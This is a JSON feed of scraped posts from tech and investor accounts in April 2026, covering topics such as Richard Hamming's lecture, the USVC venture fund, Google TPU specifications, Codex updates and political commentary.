"https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://nitter.net/sama/status/2047683787828703289#m", + "published_at": "2026-04-24T14:27:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://nitter.net/DavidSacks/status/2047672359377588241#m", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://nitter.net/DavidSacks/status/2047671706660073767#m", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "Im genuinely this Close to killing myself rn & this Shit happens like Okay", + "url": "https://nitter.net/satoshibun/status/2047641832624893993#m", + "published_at": "2026-04-24T11:40:30+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://nitter.net/ylecun/status/2047636569767419951#m", + "published_at": "2026-04-24T11:19:36+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it", + "url": "https://nitter.net/DaCapTainXD/status/2047633324676440561#m", + "published_at": "2026-04-24T11:06:42+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://nitter.net/ELLISforEurope/status/2047624126047670758#m", + "published_at": "2026-04-24T10:30:09+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 😾", + "url": "https://nitter.net/aaa___kanato/status/2047606779677376714#m", + "published_at": "2026-04-24T09:21:13+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher", + "url": "https://nitter.net/eeo_store/status/2047586383519531500#m", + "published_at": "2026-04-24T08:00:10+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://nitter.net/cginisty/status/2047565736382534091#m", + "published_at": "2026-04-24T06:38:08+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://nitter.net/bobabowen/status/2047473914528563592#m", + "published_at": "2026-04-24T00:33:16+00:00", + "source": "nitter" + }, + { + "handle": "Svwang1", + "account": "@Svwang1", + "name": "王川", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://nitter.net/Svwang1/status/2047472537488302502#m", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00", + "source": "nitter" + }, + { + "handle": "Svwang1", + "account": "@Svwang1", + "name": "王川", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://nitter.net/Svwang1/status/2047470402725921150#m", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://nitter.net/HarryStebbings/status/2047426032840634830#m", + "published_at": "2026-04-23T21:23:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://nitter.net/HarryStebbings/status/2047413285675290984#m", + "published_at": "2026-04-23T20:32:21+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://nitter.net/sama/status/2047403771416940715#m", + "published_at": "2026-04-23T19:54:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://nitter.net/sama/status/2047395562501411058#m", + "published_at": "2026-04-23T19:21:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://nitter.net/sama/status/2047392357482639749#m", + "published_at": "2026-04-23T19:09:11+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester", + "url": "https://nitter.net/breadstickz1/status/2047389262253855041#m", + "published_at": "2026-04-23T18:56:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://nitter.net/tszzl/status/2047386955550470245#m", + "published_at": "2026-04-23T18:47:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694#m", + "published_at": "2026-04-23T18:26:18+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik 